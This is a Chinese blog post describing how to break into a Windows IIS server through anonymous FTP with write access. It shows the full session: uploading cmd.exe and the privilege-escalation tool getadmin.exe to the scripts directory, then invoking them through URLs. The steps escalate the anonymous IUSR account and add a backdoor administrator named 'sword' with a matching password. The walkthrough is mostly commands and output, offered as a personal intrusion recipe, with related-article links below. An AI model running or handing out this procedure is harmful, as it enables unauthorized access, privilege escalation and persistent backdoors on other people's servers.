FTP匿名入侵

最新推荐文章于 2023-04-28 15:12:14 发布
最新推荐文章于 2023-04-28 15:12:14 发布
阅读量4.4k 收藏 5
点赞数 1
分类专栏: 网络安全 文章标签: microsoft cgi user service access 浏览器
问我怎么进行FTP匿名入侵
我才想起还有这种方式
复习简洁一番,总结了我的FTP匿名入侵经历,和大家分享:
假设一台电脑ip 192.188.0.183(这里用我自己的电脑实验)开放FTP服务
在”运行“里输入”CMD“
输入 ftp 192.188.0.183回车:

Connected to 192.188.0.183.
220 phoenix-r Microsoft FTP Service (Version 5.0).
User (192.188.0.183none)):anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
password输入任何字符+@,是不显示的)
230-你好
230-欢迎来到lzbiz的FTP站点
230 User anonymous logged in.
FTP>
进入了
输入cd /script如果改变目录成功的话就有很大的胜算了
然后将自己的cmd.exe和getadmin.exe(一个提升权限的工具)复制到对方的scripts目录
用命令put就可以了
接着输入:
FTP>bye
221 拜拜,欢迎下次再来
退出了,呵呵,还欢迎我下次再来入侵
不知道大家看到没有,上面的一大段中出现了计算机名的----phoenix-r ,所以匿名用户的名称便是IUSR——phoenix-r (这是个常识)
然后在浏览器中输入http://192.188.0.183/scripts/getadmin.exe?iusr_phoenix-r
如果返回CGI Error
就已经成功地将IUSR——phoenix-r 提升为了管理员
然后添加用户:
http://192.188.0.183/scripts/cmd.exe?/c%20c://winnt//system32//net.exe%20sword%20sword%20/add
http://192.188.0.183/scripts/getadmin.exe?sword
这样我就添加了一个叫sword的密码也为sword用户
并提升权限为了管理员
这样就成功地入侵了
以上的前提是一些粗心的管理员没有禁止guest用户,而且匿名权限为”写入“
这样我才可以成功入侵,还有就是匿名帐号是anonymous  

navyforce
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
FTP匿名用户
qq_42425149的博客
06-16 6084
FTP匿名用户、虚拟用户 FTP匿名用户关闭防火墙开启ftp服务允许匿名用户上传文件配置 FTP文件增加an...
ftp匿名用户
nlfdpzq的博客
11-18 1741
限制用户访问自己的家目录 编辑配置 vi /etc/vsftpd/vsftpd.conf download_enable=NO 只能上传,不能下载 chroot_local_user=YES 将所有用户限定在主目录内,表示开启,用户只能访问 自己的家目录 chroot_list_enable=YES 表示要启用 chroot_list_file chroot_list_file=/etc/vsftpd/chroot_list 列出的是那些“不会被限制在主目录下” 的用户 ...
如何关闭匿名FTP
weixin_42389270的博客
07-18 4920
如何关闭匿名FTP
centos----windows的ftp匿名登录输入什么用户名和密码
linux-0.11调试教程
01-03 1452
anonymous和ftp,密码可以不输入。 [root@admin]# ftp 172.2.6.15 Connected to 172.2.6.15 (172.2.6.15). 220 Microsoft FTP Service Name (172.2.6.15:root): ftp 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote sys
允许匿名登陆ftp服务器危险×××
weixin_33800593的博客
11-08 499
对于缺乏网络安全意识的网络管理员,在配置windows服务器时往往只是让web服务器能工作起来,并且打了一些常见的补丁,就认为这个服务器是很安全的了。其实也不然,当他没有注重ftp匿名登陆的危险时,就可能产生严重漏洞。下面我们将以一个实际的例子看看匿名登陆的危险性! 在shell下,我们可以开始的ftp登陆:(假设主机为192.168.0.1) ftp 192.168....
FTP错误代码列表(ftp状态码、ftp错误码)
Dontla的博客
08-10 6816
有可能是你要连接的服务器不能识别你要求浏览的文档,或者你没有访问它的权利甚至它根本就是不存在的。这也有很多可能性:你的ISP服务器死机,你公司的网关断了(如果你通过单位的局域网上网),或者你自己的系统出问题了。首先可能是你的网址有错误(漏字、大小写、符号的差异等),或者是网址最后的扩展名不对,当然也有可能是这个地址或者页面根本不存在。如果你的浏览器没有定义相关的软件就不能够访问。在使用网络蚂蚁NetAnts时最常见的错误,是你的JOB的URL地址有问题,可能是你输入有问题,也可能是服务器上连接出错。...
入门渗透:FTP入侵——Fawn
栉风沐雪的博客
01-31 1818
入门渗透:FTP入侵——Fawn,使用的是hackthebox靶机。小技巧:可以通过搜索引擎查找csftpd 3.0.3出现的CVE漏洞等,一般最新的服务漏洞不会曝光,但是如果不是最新版本,可以查找相关的漏洞,使用msf的模块进行渗透。遇到没有进行加密的ftp一般运行于21端口,此处靶机为简单的ftp服务。使用的是hackthebox的Fawn靶机。
windows下FTP匿名登录或弱口令漏洞及服务加固
09-30
FTP 弱口令或匿名登录漏洞,一般指使用 FTP 的用户启用了匿名登录功能,或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等,容易被黑客攻击,发生恶意文件上传或更严重的入侵行为
ftpserver ftpserver ftpserver ftpserver
最新发布
05-06
4. 防火墙和入侵检测:配置防火墙规则以阻止未授权访问,启用入侵检测系统以预防恶意攻击。 五、FTP服务器的应用场景 FTP服务器广泛应用于各种场景,如: 1. 开发者共享代码:团队成员可以通过FTP服务器共享项目...
爆破ftp视频教程
10-19
6. **匿名访问**:如果不需要,应禁用匿名FTP访问。 7. **防火墙规则**:仅允许特定IP地址或IP段访问FTP服务。 【FTP日志监控】 定期检查FTP服务器的日志文件,可以发现异常登录尝试,及时采取应对措施。配合入侵...
FTP扫描工具
12-21
- 扫描前确保有合法授权,否则可能涉及非法入侵行为。 - 谨慎设定扫描参数,避免对目标服务器造成过大的网络负担。 - 扫描结果应立即采取行动,修复发现的问题。 - 了解并遵守相关的法律法规,包括但不限于网络...
FTP命令字和返回码
huabiaochen的博客
06-01 3824
为了从FTP服务器下载文件,需要要实现一个简单的FTP客户端。 FTP(文件传输协议) 是 TCP/IP 协议组中的应用层协议。 FTP协议使用字符串格式命令字,每条命令都是一行字符串,以“\r\n”结尾。 客户端发送格式是:命令+空格+参数+"\r\n"的格式 服务器返回格式是以:状态码+空格+提示字符串+"\r\n"的格式,代码只要解析状态码就可以了。 读写文件需要登陆服务器,特殊用...
FTP客服端编程(ftp协议指令编程)
qq_33200959的博客
09-15 1147
先上图 第一步应该做的就是搭建服务器,或者下载简易ftp服务器。如果不知道怎么在主机上搭建ftp服务器上篇文章中有详细解说。 ftp客户端的实现大致是这么几个流程: ftp客户端需要两个tcpSocket,一个tcpSock负责给服务器发送指令、接受服务器的响应信息,另一个dataSock用来接收下载数据,或是接收服务器文件名列表数据 1.客户端使用tcpSock连接服务器。 f
FTP(21) 文件传输协议
m0_56010012的博客
04-18 2574
主要有两个开放端口:21和80。端口21是专用于FTP(文件传输协议)的端口,这意味着它的主要用途是在同一网络上的主机之间传输文件。 文件传输协议(FTP)是一种标准通信协议,用于将计算机文件从服务器传输到计算机网络上的客户端。FTP用户可以使用明文登录协议进行身份验证,通常使用用户名和密码。但是,如果服务器配置为允许,它们可以匿名连接。允许匿名连接标记。 ftp-anon: Anonymous FTP login allowed (FTP code 230) 要连接到远程FTP服务器,需要指定..
MoneyBox靶机之FTP匿名登录漏洞、隐写术、perl 语言反弹、Vmware 无法分配IP地址的问题
qq_40898302的博客
04-28 327
修改/etc/vim/vimrc.tiny文件,将set compatible改成set nocompatible,然后再添加一行set backspace=2即可。:将ro 以及后面信息改为“rw single init=/bin/bash”,然后按"Ctrl+x"进入系统。第三个flag在/root/.root.txt,用perl弹shell需要用到sudo才能获取root权限。arp扫描 、扫描eth0网卡所在网段的所有存活主机的ip。登录:ftp xxx.xxx.xxx.xxx。
匿名通信攻击技术:主动攻击、被动攻击、单端攻击、端到端攻击
学习中
03-18 5086
匿名通信攻击技术 匿名通信攻击可以分为 针对网络流量的攻击:通常基于流量分析技术,即通过嗅探并分析网络通信流量的各自模式,以获取现有价值; 针对节点的攻击:主要是匿名通信节点系统和协议存在漏洞的利用。 网络流量攻击 被动攻击和主动攻击:根据攻击者对通信行为的干涉程度进行划分。攻击者可以被动监听或主动操纵目标流量。 单端攻击和端到端攻击:根据威胁模型的不同进行划分,攻击者通过监控或控制发送方或...
内网渗透系列:隐匿攻击方法
闵行小鱼塘
07-26 1373
学习并小结下各种隐匿通道方法
vsftpd 基本配置实践 匿名anonymous用户上传文件 和 root 登陆
evanever的专栏
09-12 3264
 昨天开始就一直在弄vsftp, 只需要测试一下板子的dn和up速度.不需要太多的安全性考虑,两个问题.匿名和root用户登录,上传文件,在网上找到的东西感觉都很乱而且试了全都失败..最后终于看到一篇能让人看明白且好使的..转过来放着..vsftpd 基本配置实践 匿名anonymous用户上传文件 和 root 登陆可可火山 20080411http://linux.chinaunix.net/
网络配置笔记
风云
05-03 1493
企业内部网结构 一、VLAN TTL---Time To Live 存活时间。   TTL=255  说明你ping的是一台路由器、交换机或防火墙。 TTL=128  对端是一台Windows主机 TTL=64   是Linux/Unix主机   概念:VLAN---Virtual Local AreaNetwork 虚拟局域网。作用:隔离广播域。             一个部
强化Windows 2003 FTP服务器安全策略:操作指南
此外,还提到了匿名FTP的安全漏洞和检查,因为匿名FTP由于无需身份验证,易被滥用。管理员需要了解这些漏洞,比如目录浏览权限、弱密码问题等,以便采取相应措施予以修复。 这份操作手册旨在帮助网站管理者强化...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值